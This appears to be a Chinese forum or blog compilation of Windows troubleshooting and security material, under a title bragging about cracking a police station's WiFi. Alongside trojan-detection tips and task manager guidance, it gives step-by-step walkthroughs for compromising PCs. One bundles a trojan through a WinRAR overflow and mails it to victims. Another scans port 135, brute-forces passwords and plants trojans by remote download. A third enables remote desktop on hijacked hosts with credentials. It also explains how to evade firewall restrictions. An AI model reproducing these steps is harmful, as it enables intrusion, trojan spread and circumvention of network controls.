经过2个小时破解学习,蹭网终于成功!(附近派出所的WiFi)
错误编号: 711
错误信息: 在此计算机上的配置错误阻止此连接。
错误详情: 此问题目前较为纠结
1. 将下面的代码(现在你的桌面上新建个文本文档然把代码复制进去)另存为.bat格式(名字自己娶一个就好,我设为711.bat) 放到不易删除的地方,代码为
@ECHO OFF
takeown /f "C:WindowsSystem32LogFilesWMI" /r /d y icacls "C:WindowsSystem32LogFilesWMI" /grant administrators:F /t
2,单击“开始” “所有程序” “启动“,在启动上右键打开 将711.bat复制到打开的窗口里,然后双击运行一下711.bat,重新启动计算机即可。
3. 如果觉得1,2提供的方法不好,可以采用,打开命令行CMD(以管理员运行),输入netsh winsock reset 回车,重启即可,但此方法不一定有效,
4. 又是一种方法:找到 C:WindowsSystem32LogFilesWMI 这个文件夹,只要将这个文件夹管理员取得所有权然后重启就行了! 使用魔方在系统设置右键菜单管理里面新增“获得管理员权限”的功能,然后就可以在上面这个文件夹上点击鼠标右键,管理员取得所有权即可解决
c系统盘下面有一个JMSOFT文件夹,请问高手这是干什么的?
好好看看 你可能成为了 人家的肉鸡 就是你的电脑被人家控制了 你要是不知道怎么做的话 就把系统从新装一下
禁鸡!检查隐藏的“肉鸡”——4招查出隐藏在电脑中的木马
天涯 (2007年5月14日 第19期)
木马在互联网上肆虐,我们一不小心就会成为黑客手中的肉鸡。到时自己的电脑成为被黑客控制的傀儡,而且自己的个人隐私也完全暴露。拒绝黑客控制,我的电脑我做主。在五一节后这一黑客大肆捕获肉鸡的时段开始了,我们针对木马特点,用4招自检避免成为黑客肉鸡。
小知识:肉鸡实际上就是中了黑客的木马,或者被安装了后门程序的电脑。黑客可以像计算机管理员一样对肉鸡进行所有操作。现在许多人把有WEBSHELL权限的远程主机也叫做肉鸡。
第一招:系统进程辨真伪
当前流行的木马,为了更好地对自身加以隐藏,使用了很多方法进行自身隐蔽,其中最常见的就是进程隐藏。这种方法不仅让人很难通过常见的检查手法查找到,如果用户操作不当的话还可能将系统进程删除,造成系统不稳定甚至崩溃。常见的这类木马程序包括灰鸽子、守望者、上兴木马等。
自检方法
黑客为了对木马进行更好的伪装,常常将木马名称设置得和系统进程名称十分相似。通常系统进程都是有System用户加载的,如果我们发现某个“系统进程”是由当前用户加载的,那么这个“系统进程”一定有问题。
另外我们也可以从系统进程的路径来进行分辨,比如正常的系统进程svchost.exe应该在“c:\Windows\system32”目录下,如果用户发现它的路径在其他目录下就表明该进程有问题。
除此以外,现在的木马很注意对自身服务端程序的保护,我们通过“任务管理器”很可能查看不到木马的服务端进程,因为木马程序通过线程插入等技术对服务端程序进行了隐藏。
在这里树树建议大家使用IceSword(下载地址:http://download.cpcw.com)对进程进行管理。它除了可以查看各种隐藏的木马后门进程,还可以非常方便地终止采用多线程保护技术的木马进程。
进入IceSword点击“文件→设置”命令,去掉对话框中的“不显示状态为Deleting的进程”选项。点击程序主界面工具栏中的“进程”按钮,在右边进程列表中就可以查看到当前系统中所有的进程,隐藏的进程会以红色醒目地标记出(图1)。
图1
另外,如果发现多个IE进程、Explore进程或者Lsass进程,那么我们就要留意了。因为很多木马都会伪装成这几个进程访问网络。
应对方法
在IceSword的进程列表中选择隐藏的木马程序,点击鼠标右键中的“强行结束”命令即可结束这个进程。然后点击IceSword的“文件”按钮,通过程序模拟的资源管理器命令,找到并删除木马程序的文件即可。]
第二招:启动项中细分析
一些木马程序通过系统的相关启动项目,使得相关木马文件也可以随机启动,这类木马程序包括TinyRAT、Evilotus、守望者等。
检方法
运行安全工具SysCheck(下载地址:http://download.cpcw.com),点击“服务管理”按钮后即可显示出当前系统中的服务信息,如果被标注为红色的就是增加的非系统服务。通过“仅显示非微软”选项就可以屏蔽系统自带的服务,这样恶意程序添加的服务项就可以立刻现形。
点击“修改时间”或“创建时间”选项,就可以让用户马上查看到新建的系统服务(图2)。从图中我们可以看到一个被标注为红色、名称为Windows Media Player的系统服务,该服务所指向的是一个不明程序路径。因此可以确定该服务就是木马程序的启动服务。
图2
通过安全工具SysCheck的“活动文件”项目,可以显示出包括启动项等信息在内的、容易被恶意程序改写的系统注册表键值。比如现在某些恶意程序,通过修改系统的“load”项进行启动,或者修改系统的BITS服务进行启动。由于SysCheck程序只是关注改写了的键值,所以在不同的系统上显示的内容并不一样。
应对方法
进入SysCheck点击鼠标右键中的“中止服务”选项,中止该木马程序的启动服务,接着点击“删除服务”命令删除指定的服务键值。然后点击“文件浏览”按钮,由于SysCheck采用了反HOOK手段,所以内置的资源管理器可以看到隐藏的文件或文件夹,这样就方便了我们进行隐藏文件的删除工作。按照木马服务所指的文件路径,找到文件后点击鼠标右键中的“删除”按钮即可。
第三招:系统钩子有善恶
木马程序之所以能成功地获取用户账号信息,就是通过钩子函数对键盘以及鼠标的所有操作进行监控,在辨别程序类型后盗取相应的账号信息。也就是说,只要拥有键盘记录功能的木马程序,就肯定会有系统钩子存在。
自检方法
通过游戏木马检测大师(下载地址:http://download.cpcw.com)的“钩子列表”功能,可以显示系统已经安装的各种钩子,这样可以显示出当前网络中流行的主流木马。
点击“钩子列表”标签进行钩子信息的查看,并且不时点击鼠标右键中的“刷新”命令对系统钩子进行刷新。因为木马程序只有在键盘记录的时候才会启用钩子,如果大家中了木马,那么很快就会在列表中有所发现了。在本例中一个名为WH_JOURNALRECORD可疑的钩子被程序以显著颜色标记出来(图3)。
图3
这个钩子是用来监视和记录输入事件的,黑客可以使用这个钩子记录连续的鼠标和键盘事件。在此时,我们就应该引起重视,不要再使用QQ等需要输入密码的程序。
应对方法
清除方法比较简单,只要记录下动用系统钩子的进程PID,通过PID值找到该木马程序的进程后结束该进程,再输入“Regedit”打开注册表编辑器,并点击“编辑”菜单中的“查找”命令,在此窗口搜索该木马程序进程的相关消息,将找到的所有信息全部删除。
重新启动计算机,只要在安全模式下删除系统目录中的木马文件信息即可。当然也可以通过前面几种方式进行相互检测,这样可以更加有效地清除系统中的木马程序。
第四招:数据包里藏乾坤
现在,越来越多的木马程序利用了Rootkit技术。Rootkit是一种集合了系统间谍程序、病毒以及木马等特性的一种恶意程序,它利用操作系统的模块化技术,作为系统内核的一部分进行运行,有些Rootkits可以通过替换DLL文件或更改系统来攻击Windows平台。
自检方法
同样我们还是使用游戏木马检测大师这款程序,利用它的“发信检测”功能来判断自己的系统中是否被安装了木马程序。在使用该功能以前,首先需要判断系统的网卡是否工作正常。
我们关闭其他一切会扰乱网络数据捕捉的程序,然后去除“只捕获smtp发信端口(25)和Web发信端口(80)”选项,点击“开始”按钮就可以进行数据包的捕捉。如果这时捕捉到有数据包发出,就证明自己的系统中存在木马程序。
根据木马程序连接方式的不同,捕捉到的数据信息也不尽相同,但是捕捉到客户端程序的IP地址还是没有问题的(图4)。用过嗅探器的朋友都知道,我们可以通过设置过滤病毒特征数据包来发现蠕虫病毒,当然这种方法需要一定的相关知识,这里就不再叙述了。
图4
应对方法
对于这种利用Rootkit技术的木马程序,可以直接通过一些Rootkit检测工具进行查看。比如检测工具Rootkit Detector(下载地址:http://download.cpcw.com),它通过程序内置的MD5数据库,来比较所检测到的Windows 2000/XP/2003 系统全部服务和进程的MD5校验值,这样就可以检测出系统下的Rootkit程序。
在命令提示符窗口运行命令:rd.exe,程序会自动对当前系统进行检测。程序首先会统计出系统中服务的数目、当前的进程,以及被隐藏的进程,并且将系统当前的进程用列表显示出来,然后进入安全模式进行删除即可。
常见木马以及病毒专杀工具
在这里,我们向大家提供能速杀流行木马以及病毒的专杀工具。我们可以根据需要,搭配使用这些专杀工具,让自己的电脑更加安全。
灰鸽子专杀工具
瑞星:http://download.rising.com.cn/zsgj/GPDetect.exe
熊猫烧香专杀工具
金山:http://down.www.kingsoft.com/db/download/othertools/DuBaTool_WhBoy.BAT
麦英病毒专杀工具
江民:http://download.jiangmin.info/jmsoft/ANIWormKiller.exe
威金病毒专杀工具
江民:http://download.jiangmin.info/jmsoft/VikingKiller.exe
-------------------------------------------------------------------------------------------------------------------
当心PC变成“肉鸡”——巧用WinRAR来抓鸡
湖南 王强 (2007年9月10日 第36期)
所属主题:抓鸡系列
杀伤力值:★★
操作难度:较低
适合读者:普通读者
WinRAR已经成为用户电脑中必装的软件,可你想过黑客会利用它来抓鸡吗?这是真的,只需一个小小的WinRAR漏洞利用程序,就可以把.rar格式的文件变成抓鸡工具。一旦运行了文件就会变成黑客的肉鸡。这是目前抓鸡比较有效的方法之一,我们应该如何防范呢?下面我们就来揭开谜底。
小知识:抓鸡是黑客常用术语,意思是指主动通过某些程序(如木马程序或远程控制程序的客户端)或技术手段控制用户的PC机,被控制的PC机称之为肉鸡。
为什么要用WinRAR漏洞抓鸡
网络上流传有很多可执行文件捆绑工具,这些工具虽然可以方便的将两个或多个可执行文件捆绑为一个程序,并且可以进行简单的伪装,但是其原理却决定了其不可能成为完美的捆绑工具,目前主流的杀毒软件都可以轻易地将它清除掉。
而用WinRAR漏洞捆绑木马来抓鸡就很有优势,因为普通捆绑检测都是用16进制编辑工具查看程序PE头进行判定的(大部分捆绑程序检测工具用的就是这个原理),但是这条不适合这个漏洞。
小提示:该漏洞的原理是由于WinRAR在处理LHA格式文件时存在边界条件错误,而若将一个经处理后文件改为长文件名并附加成LHA文件,再调用相应参数生成新的压缩包后,被WinRAR打开的时候就会导致本地缓冲溢出。
当用户点击压缩包时会出现错误提示(图1),这时木马程序就已经悄悄运行了,肉鸡就到手了。所以如果我们用这个漏洞来抓鸡,成功率是十分高的,比原始的3389端口抓鸡的成功率高多了。
图1
如何用WinRAR漏洞抓鸡
Step1:将WinRAR的利用程序放到任意目录中,例如C盘根目录。
Step2:单击菜单中“开始→运行”命令,输入“cmd”运行“命令提示符”。将光标切换到“c:”,输入“rar.exe”查看利用程序的使用方法。其使用方法为:“rar [选项] ”。
其中“选项”可以指定生成的文件名以及选择溢出的操作系统等操作。我们使用默认的配置,可以不输入,有需要的话可以添加相应的“选项”。
Step3:将配置好的木马服务端程序也放到C盘根目录,并命名为123.exe。在“命令提示符”中输入命令:“rar 123.exe”,如果回显中出现“All Done! Have fun!”字样即表示捆绑有木马的WinRAR文件生成了(图2)。
图2
Step4:最后我们要做的就是将这个捆绑有木马程序的WinRAR文件发送给别人,当对方运行这个WinRAR文件时,将会出现错误,但是木马已经悄悄地在对方系统后台运行了。对方的电脑也就成了我们的肉鸡(图3)。
图3
不过要充分利用这个漏洞,光靠触发漏洞是不够的,木马的配置也很重要,例如要设置运行后删除自身,安装服务端时不出现提示等,这样当用户运行恶意WinRAR文件时只会出现WinRAR的错误提示,是丝毫感觉不到木马运行的。接着我们还要给木马加上免杀,例如加壳处理和修改特征码等,否则被杀毒软件检测出来岂不前功尽弃。
小提示:运行漏洞利用工具时请先关闭杀毒软件,因为杀毒软件会把它当作黑客工具给清除掉。
防范技巧
1.不要运行陌生人发过来的文件。这是老生常谈的问题了,只不过以前只针对可执行文件,现在连WinRAR也不能轻易运行了。
2.识别恶意的WinRAR文件。在运行WinRAR文件之前,我们可以先对其进行检查,确定无危害后再运行,检查的方法为:右键单击WinRAR文件,在菜单中如果没有“用WinRAR打开 ”这一项,则说明压缩包有异常,不要轻易打开!
3.升级WinRAR到3.7以上的版本,新版本打开虽仍会提示出错,但木马程序不会运行。
攻防博弈
攻 黑客:虽然很多人都有给系统打补丁的习惯,但会给应用软件升级的人少之又少,所以将捆绑有木马的WinRAR文件上传到软件下载网站或一些资源论坛中,将大大增加抓到的肉鸡数量。抓鸡的方法多种多样,我们还可以用135端口来抓安全意识不强的鸡。
防 编辑:系统软件的漏洞可以通过自动更新来解决,而工具软件的漏洞只能通过经常关注一些专业媒体的提醒,定期升级程序来解决。同时养成良好安全习惯,不接收不下载来路不明的压缩文件才是最好的防范方法!至于135端口抓鸡,只要我们关闭了端口,调高了防火墙的安全等级就不用惧怕。
-----------------------------------------------------------------------------------------------------------------------
小心端口招蜂引蝶——防范用135端口抓鸡的黑手
万立夫 (2007年9月17日 第37期)
新学期到了,许多学生都要配机,新电脑的安全防卫做好了吗?能不能拒绝成为黑客的肉鸡?令人遗憾的是,很多新手都不知道或者忽视了对敏感端口的屏蔽。例如135端口,一旦黑客利用135端口进入你的电脑,就能成功地控制你的机子。我们应该如何防范通过135端口入侵呢?下面我们就为大家来揭开谜底。
小知识:每台互联网中的计算机系统,都会同时打开多个网络端口,端口就像出入房间的门一样。因为房间的门用于方便人们的进出,而端口则为不同的网路服务提供数据交换。正如房间的门可以放进小偷一样,网络端口也可以招来很多不速之客。
一、为什么135端口会被利用来抓鸡
如今,大多数黑客都使用网页木马来捕捉肉鸡,为什么还有一些黑客老惦记着135端口呢?主要原因有两个:
一个原因是135端口是WMI服务默认打开的端口。由于WMI服务是Windows系统提供的服务,因此利用它入侵不但不会引起用户注意还很方便,只需要一个脚本代码就可以对远程系统进行管理。WMI服务默认打开的是135端口,因此WMI入侵也被称之为135端口入侵。
另外一个原因是135端口开放的机子实在不少,这种现象可能是由于每年新增加的电脑用户的安全意识不强或者不知道怎么关闭造成的。令人担忧的是,连3389这样危险的端口也可以在网络上搜出不少。
小知识:WMI服务是“Microsoft Windows 管理规范”服务的简称,可以方便用户对计算机进行远程管理,在很多方面和系统服务远程桌面十分相似。只不过远程桌面是图形化操作,而WMI服务是利用命令行操作而已。
WMI服务需要“Windows Management Instrumentation”服务提供支持。而这个服务是默认启动的,而且是系统重要服务,这样就为入侵提供了便利。正是由于它可以进行远程控制操作,因此系统的安全性也就随之下降,因此被称之为永远敝开的后门程序。
二、黑客是怎么利用135端口抓鸡的
Step1:黑客入侵的第一步就是扫描网络中开启了135端口的远程系统。扫描使用的工具有很多,这里使用的工具是常见的《S扫描器》(下载地址:http://www.cpcw.com/bzsoft/),因为它的扫描速度非常快。单击开始菜单中的“运行”命令,输入“cmd”打开命令提示符窗口,然后输入下面一段命令:S tcp 192.168.1.1 192.168. 1.255 135 100 /save(图1)。
图1
前面和后面的IP地址表示扫描的开始和结束地址,后面的135表示扫描的端口,100表示扫描的线程数,数值越大表示速度越快。需要特别说明的是,很多Windows系统默认限制线程为10,我们需要利用修改工具改调这个限制才行。
小提示:例如我们打开《比特精灵》的安装目录,运行其中的BetterSP2.exe,在弹出窗口的“更改限制为”选项中设置为256,最后点击“应用”按钮并且重新启动系统即可。
Step2:从已经打开135端口的电脑中筛选可以入侵的目标。首先打开S扫描器目录中的IP地址文件Result.txt,对文本文件中多于的信息进行删除,只保留和IP地址相关的内容。接着运行破解工具NTScan(下载地址:http://www.cpcw.com/bzsoft/),它可以对远程系统进行破解(图2)。
图2
在NTScan窗口中的“主机文件”中设置IP地址文件,选中WMI扫描类型,然后在“扫描端口”中设置为135。最后点击“开始”按钮就可以进行破解操作,破解成功的主机地址都保存在NTScan.txt中。
Step3:现在利用Recton这款工具来上传我们的木马程序(下载地址:http://www.cpcw.com/bzsoft/)。点击窗口中的“种植”标签,在NTScan.txt中寻找一个地址,接着将它添加到“远程主机设置”选项中。然后选择“Http下载”选项,并在“文件目录”设置木马程序的网页链接地址,最后点击“开始执行”按钮即可(图3)。
图3
这样木马程序就利用135端口上传到远程主机,并且在系统后台已经悄悄地运行了。这种方式不需要远程用户参予,因此它的隐蔽性和成功率都非常高,并且适何肉鸡的批量捕捉,但是上传的木马程序一定要经过免杀处理才行。
小提示:运行黑客工具的时候需要先关闭杀毒软件,因为杀毒软件会把它们当作病毒给清除掉。
三、防范技巧
1.利用网络防火墙屏蔽系统中的135端口,这样就让黑客入侵从第一步开始就失败。除此以外,像139、445、3389这些端口也是我们要屏蔽的端品。
2.增强当前系统中管理员的账号密码的强度,比如密码至少设置6位以上,并且其中包括数字、大小写字母等。这样黑客工具就不能轻易地破解我们的账号密码,这样即使是扫描到我们的135端口也无济于事。
3.安装最新版本的杀毒软件,并且将病毒库更新到最新,这个已经是老生常谈的问题。如果有可能的话,用户最好使用带有主动防御功能的杀毒软件。
攻防博弈
攻 黑客:利用135端口的确可以捕捉到大量肉鸡,不过要花费比较多的时间。随着操作系统的不断更新,以及人们对135端口进行防范的加强,这种方法已经逐渐菜鸟化,真正的高手不屑一顾。黑客抓鸡的方法有很多,比如我们还可以利用迅雷进行捆绑木马的传播,这是个较流行的抓鸡方法。
防编辑:既然黑客利用135端口入侵,我们只要将相关功能进行禁止,或加以限制就可以了。另外,对于黑客使用迅雷进行捆绑木马的传播,除了在下载的过程中利用迅雷的安全功能进行检测以外,还可以利用《网页木马拦截器》这款工具。无论是网页木马还是捆绑木马,只要运行就会被拦截并且提示用户注意。
----------------------------------------------------------------------------------------------------------------
Ps:以上内容引自电脑报
(不必恐慌,积极应对解决才是上策)
戴尔620s联网出现错误代码651求高手破解
错误代码651意思为
您的调制解调器(或其它连接设备)报告了一个错误。既未找到指定的端口。
解决办法:
1、远程访问记事簿文件和当前的“网络和拨号连接”配置可能不一致如果更改了通讯设备(例如:串行口或调制解调器),请确保重新配置“网络和拨号连接”。如果错误仍然存在,请删除并重新创建“网络和拨号连接”.
2、win7 错误代码651,路由能上,拨号上不了
试一下:打开 \windows\system32\logfiles\wmi,双击打开wmi再打开里面的RtBackup 会提示你需要管理员权限 继续 重启,即可修复。
3、不行的话把wmi里的后缀为etl的文件删除包括RtBackup里的 重启
4、如果上面的都不管用的话那尝试一下,禁用本地连接-关机-检查猫的所有插头拔下重插-拔下猫的电源插头-等待2分钟 之后插上插头-开机。
5、最后一招先从别的能上网的系统的机子里复制下面这个文件 c:\windows\system32\drivers\raspppoe.sys 来替换你电脑里的这个文件。
在进行3389端口入侵时遇到了密码怎么破解?
1,打开记事本,编辑内容如下:
echo [Components] c:\sql
echo TSEnable = on c:\sql
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
编辑好后存为BAT文件,上传至肉鸡,执行。这里值得注意的是要确定winnt是否在c盘,如果在其他盘则需要改动。
2 (对xp\2000都有效) 脚本文件 本地开3389 工具:rots1.05使用方法:在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本,例如:
c:\cscript ROTS.vbs 目标IP 用户名 密码 [服务端口] [自动重起选项]
服务端口: 设置终端服务的服务端口。默认是3389。
自动重起选项: 使用/r表示安装完成后自动重起目标使设置生效。
使用/fr表示强制重起目标。(如果/r不行,可以试试这个)
使用此参数时,端口设置不能忽略。
比如扫描到了一个有NT弱口令的服务器,IP地址是222.222.222.222,管理员帐户是administrator,密码为空
运行CMD(2000下的DOS),我们给它开终端!命令如下!cscript reg.vbe 222.222.222.222 administrator "" 3389 /fr
上面的命令应该可以理解吧?cscript reg.vbe这是命令,后面的是IP,然后是管理员帐户,接这是密码,因为222.222.222.222 这台服务器的管理员密码是空的,那就用双引号表示为空,再后面是端口,你可以任意设置终端的端口,/fr是重启命令(强制重启,一般我都用这个,你也可以 /r,这是普通重启)
脚本会判断目标系统类型,如果不是server及以上版本,就会提示你是否要取消。
因为pro版不能安装终端服务。
如果你确信脚本判断错误,就继续安装好了。
如果要对本地使用,IP地址为127.0.0.1或者一个点(用.表示),用户名和密码都为空(用""表示)。
脚本访问的目标的135端口,如果目标135端口未开放,或者WMI服务关闭,那么脚本就没用了。3,下载3389自动安装程序-djshao正式版5.0
怎么破解防火墙
可能现在对局域网上网用户限制比较多,比如不能上一些网站,不能玩某些游戏,不能上MSN,端口限制等等,一般就是通过代理服务器上的软件进行限制,如现在谈的最多的ISA Server 2004,或者是通过硬件防火墙进行过滤。下面谈谈如何突破限制,需要分限制情况进行说明:
一、单纯的限制某些网站,不能访问,网络游戏(比如联众)不能玩,这类限制一般是限制了欲访问的IP地址。
对于这类限制很容易突破,用普通的HTTP代理就可以了,或者SOCKS代理也是可以的。现在网上找HTTP代理还是很容易的,一抓一大把。在IE里加了HTTP代理就可以轻松访问目的网站了。
二、限制了某些协议,如不能FTP了等情况,还有就是限制了一些网络游戏的服务器端IP地址,而这些游戏又不支持普通HTTP代理。
这种情况可以用SOCKS代理,配合Sockscap32软件,把软件加到SOCKSCAP32里,通过SOCKS代理访问。一般的程序都可以突破限制。对于有些游戏,可以考虑Permeo Security Driver 这个软件。如果连SOCKS也限制了,那可以用socks2http了,不会连HTTP也限制了吧。
三、基于包过滤的限制,或者禁止了一些关键字。这类限制就比较强了,一般是通过代理服务器或者硬件防火墙做的过滤。比如:通过ISA Server 2004禁止MSN ,做了包过滤。这类限制比较难突破,普通的代理是无法突破限制的。
这类限制因为做了包过滤,能过滤出关键字来,所以要使用加密代理,也就是说中间走的HTTP或者SOCKS代理的数据流经过加密,比如跳板,SSSO, FLAT等,只要代理加密了就可以突破了, 用这些软件再配合Sockscap32,MSN就可以上了。 这类限制就不起作用了。
四、基于端口的限制,限制了某些端口,最极端的情况是限制的只有80端口可以访问,也就只能看看网页,连OUTLOOK收信,FTP都限制了。当然对于限制几个特殊端口,突破原理一样。
这种限制可以通过以下办法突破:
1、找普通HTTP80端口的代理,12.34.56.78:80,象这样的,配合socks2http,把HTTP代理装换成SOCKS代理,然后再配合SocksCap32,就很容易突破了。这类突破办法中间走的代理未 加密。通通通软件也有这个功能。
2、用类似FLAT软件,配合SocksCap32,不过所做的FLAT代理最好也是80端口,当然不是80端口也没关系,因为FLAT还支持再通过普通的HTTP代理访问,不是80端口,就需要再加一个80端口的HTTP 代理。这类突破办法中间走的代理加密,网管不知道中间所走的数据是什么。代理跳板也可以做到,不过代理仍然要80端口的。对于单纯是80端口限制,还可以用一些端口转换的技术突破限制。
五、以上一些限制综合的,比如有限制IP的,也有限制关键字,比如封MSN,还有限制端口的情况。
一般用第四种情况的第二个办法就可以完全突破限制。只要还允许上网,呵呵,所有的限制都可以突破。
任务管理器的高手问题
任务管理器有什么
任务管理器的用户界面提供了文件、选项、查看、窗口、关机、帮助等六大菜单项,例如“关机”菜单下可以完成待机、休眠、关闭、重新启动、注销、切换等操作,其下还有应用程序、进程、性能、联网、用户等五个标签页,窗口底部则是状态栏,从这里可以查看到当前系统的进程数、CPU使用比率、更改的内存容量等数据,默认设置下系统每隔两秒钟对数据进行1次自动更新,当然你也可以点击“查看→更新速度”菜单重新设置。
1. 应用程序
这里显示了所有当前正在运行的应用程序,不过它只会显示当前已打开窗口的应用程序,而QQ、MSN Messenger等最小化至系统托盘区的应用程序则并不会显示出来。
你可以在这里点击“结束任务”按钮直接关闭某个应用程序,如果需要同时结束多个任务,可以按住Ctrl键复选;点击“新任务”按钮,可以直接打开相应的程序、文件夹、文档或Internet资源,如果不知道程序的名称,可以点击“浏览”按钮进行搜索,其实这个“新任务”的功能看起来有些类似于开始菜单中的运行命令。
2. 进程
这里显示了所有当前正在运行的进程,包括应用程序、后台服务等,那些隐藏在系统底层深处运行的病毒程序或木马程序都可以在这里找到,当然前提是你要知道它的名称。找到需要结束的进程名,然后执行右键菜单中的“结束进程”命令,就可以强行终止,不过这种方式将丢失未保存的数据,而且如果结束的是系统服务,则系统的某些功能可能无法正常使用。
Windows的任务管理器只能显示系统中当前进行的进程,而Process Explorer可以树状方式显示出各个进程之间的关系,即某一进程启动了哪些其他的进程,还可以显示某个进程所调用的文件或文件夹,如果某个进程是Windows服务,则可以查看该进程所注册的所有服务,需要的朋友可以从 http://www.skycn.com/soft/17580.html 下载。
3. 性能
从任务管理器中我们可以看到计算机性能的动态概念,例如CPU和各种内存的使用情况。
CPU使用情况:表明处理器工作时间百分比的图表,该计数器是处理器活动的主要指示器,查看该图表可以知道当前使用的处理时间是多少。
CPU使用记录:显示处理器的使用程序随时间的变化情况的图表,图表中显示的采样情况取决于“查看”菜单中所选择的“更新速度”设置值,“高”表示每秒2次,“正常”表示每两秒1次,“低”表示每四秒1次,“暂停”表示不自动更新。
PF使用情况:PF是页面文件page file的简写。但这个数字常常会让人误解,以为是系统当时所用页面文件大小。正确含义则是正在使用的内存之和,包括物理内存和虚拟内存。那么如何得知实际所使用的页面文件大小昵?一般用第三方软件,比如PageFile Monitor,也可以通过windows控制台来看。本人的页面文件预设了。
页面文件使用记录:显示页面文件的量随时间的变化情况的图表,图表中显示的采样情况取决于“查看”菜单中所选择的“更新速度”设置值。
总数:显示计算机上正在运行的句柄、线程、进程的总数。
执行内存:分配给程序和操作系统的内存,由于虚拟内存的存在,“峰值”可以超过最大物理内存,“总数”值则与“页面文件使用记录”图表中显示的值相同。
句柄数:这个东东很专业的。会编程的人知道,我不懂,只知道被称作指针的指针,“线程数”指程序中能独立运行的部分,“进程数”简单理解就是运行的程序数目。
物理内存:计算机上安装的总物理内存,也称RAM,“可用数”物理内存中可被程序使用的空余量。但实际的空余量要比这个数值略大一点,因为物理内存不会在完全用完后才去转用虚拟内存的。也就是说这个空余量是指使用虚拟内存(pagefile)前所剩余的物理内存。 “系统缓存”被分配用于系统缓存用的物理内存量。主要来存放程序和数据等。一但系统或者程序需要,部分内存会被释放出来,也就是说这个值是可变的。
认可用量总数:其实就是被操作系统和正运行程序所占用内存总和,包括物理内存和虚拟内存(page file)。它和上面的PF使用率是相等的。“限制”指系统所能提供的最高内存量,包括物理内存(RAM)和虚拟(page file)内存。 “峰值”指一段时间内系统曾达到的内存使用最高值。如果这个值接近上面的“限制”的话,意味着要么你增加物理内存,要么增加pagefile,否则系统会给你颜色看的!
内核内存:操作系统内核和设备驱动程序所使用的内存,“分页数”是可以复制到页面文件中的内存,一旦系统需要这部分物理内存的话,它会被映射到硬盘,由此可以释放物理内存;“未分页”是保留在物理内存中的内存,这部分不会被映射到硬盘,不会被复制到页面文件中。
4. 联网
这里显示了本地计算机所连接的网络通信量的指示,使用多个网络连接时,我们可以在这里比较每个连接的通信量,当然只有安装网卡后才会显示该选项。
5. 用户
这里显示了当前已登录和连接到本机的用户数、标识(标识该计算机上的会话的数字ID)、活动状态(正在运行、已断开)、客户端名,可以点击“注销”按钮重新登录,或者通过“断开”按钮连接与本机的连接,如果是局域网用户,还可以向其他用户发送消息呢。
[编辑本段]任务管理器之特别任务
其实,任务管理器除了终止任务、结束进程、查看性能外,它还可以完成很多更高级的特别任务呢。下面,我们通过几个实例来介绍任务管理器的扩展应用:
实例一:同时最小化多个窗口
切换到“应用程序”标签页,按住Ctrl键同时选择需要同时最小化的应用程序项目,然后点击这些项目中的任意一个,从右键菜单中选择“最小化”命令即可,这里同时还可以完成层叠、横向平铺、纵向平铺等操作。
实例二:降低BT软件的资源占用率
运行BT软件时,往往会占用大量的系统资源,你会看到硬盘灯不停闪烁并伴随着飞速转动的噪音,此时无论是浏览网页或是运行其他应用程序,肯定会有系统停滞的感觉。
打开“任务管理器→进程”窗口,选择BT软件的进程名,然后从右键菜单中选择“设置优先级”命令,这里可以选择实时、高、高于标准、标准、低于标准、低等不同级别,请根据实际情况进行设置,例如设置为“低于标准”可以降低进程的优先级别,从而让Windows为其他进程分配更多的资源。
实例三:打造增强版本的任务管理器
有热心网友从Longhorn中将任务管理器剥离出来并提供下载,我们可以借此来打造一个增强版本的任务管理器。解压缩下载文件,会得到Taskkill.exe、Tasklist.exe、Taskmgr.exe等3个文件,首先覆盖\Windows\System32\Dllcahe\下的同名文件,覆盖前请事先备份源文件,接下来继续覆盖\Windows\System32\下的同名文件,当弹出“Windows文件保护”对话框时,选择“取消”按钮。
更换后的任务管理器不仅程序图标发生了变化,右击进程,可以发现在右键菜单中增加了打开所在目录、创建转储文件两个命令,而“查看→选择列”中增加了命令行、映像路径两个项目,前者可以查看所显示的进程是否被伪装,后者则可以查看进程的文件路径。
实例四:打开处理器的超线程
P4处理器的超线程技术(Hyper-Threading Technology)其实是相当于将一颗处理器分为两个虚拟的处理器,简单地说,实现超线程需要处理器、主板、操作系统三方面的支持。如果你使用的是Windows XP/Server 2003,而且确定自己的主板和处理器支持超线程,那么可以切换到“性能”标签页,如果这里显示两个CPU使用记录图表的话,说明你的处理器确确实实已经打开超线程。
当然,我们也可以在开机信息中查看超线程支持情况,一般会显示CPU1、CPU2两个处理器名称,或者启动后进入“设备管理器”,这样同样会显示两个处理器的信息。
实例五:禁用任务管理器
任务管理器可以完成如此强大的任务,如果你使用的是公用计算机,而又不希望他人私自操作任务管理器,可以在“开始→运行”框中键入Gpedit.msc命令打开组策略窗口,找到“本地计算机策略→用户配置→管理模板→系统→Ctrl+Alt+Del选项”项,然后在右侧窗口中选择“删除任务管理器”项,将其设置为“已启用”,以后按下“Ctrl+Alt+Del”组合键时就无法操作任务管理器了。
当然,通过文中提到的其他两个方法还是可以正常操作任务管理器的,一劳永逸的解决办法是为Taskmgr.exe文件设置用户授权,当然必须使用NTFS文件系统才行,呵呵。
也可以修改注册表来禁用:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system
新建Dword值:DisableTaskMgr=1(禁用)DisableTaskMgr=0(解禁)
小知识
句柄:用来惟一标识资源(例如文件中注册表项)的值,以便程序可以访问它。
线程:在运行程序指令的进程的对象,线程允许在进程中进行并发操作,并使一个进程能够在不同处理器上同时运行其程序的不同部分。
进程:一个可执行程序(例如资源管理器)或者一种服务(例如MSTask)
6.当任务管理器的界面出现不正常,如性能.进程的切换栏不见了,无法最大化最小化时等等时,你可以采取以下措施恢复如无管理器的界面。操作如下:在边框上空白处双击即可!!
Windows系统的任务管理器是大家经常会用到的一个程序,通常它主要被用来管理计算机进程或者查看计算机实时的工作状态。实际上它还有不少的妙用。
奇招一:在网吧也能“运行”
在网吧“混”的朋友们都知道,网吧的机子通常来说都会将运行对话框屏蔽掉,如果大家碰上某些情况需要使用运行对话框就只能束手无策了。其实这个时候任务管理器能被临时用来代替运行对话框的作用。
先按住“Ctrl+Alt+Del”组合键尝试一下能否调出任务管理器,能调出就好办了,我们依次点击任务管理器的菜单“文件→新建任务”,弹出“创建新任务”(图1)窗口,输入内容试试看,它跟运行对话框效果相同啊!
奇招二:快速刷新注册表
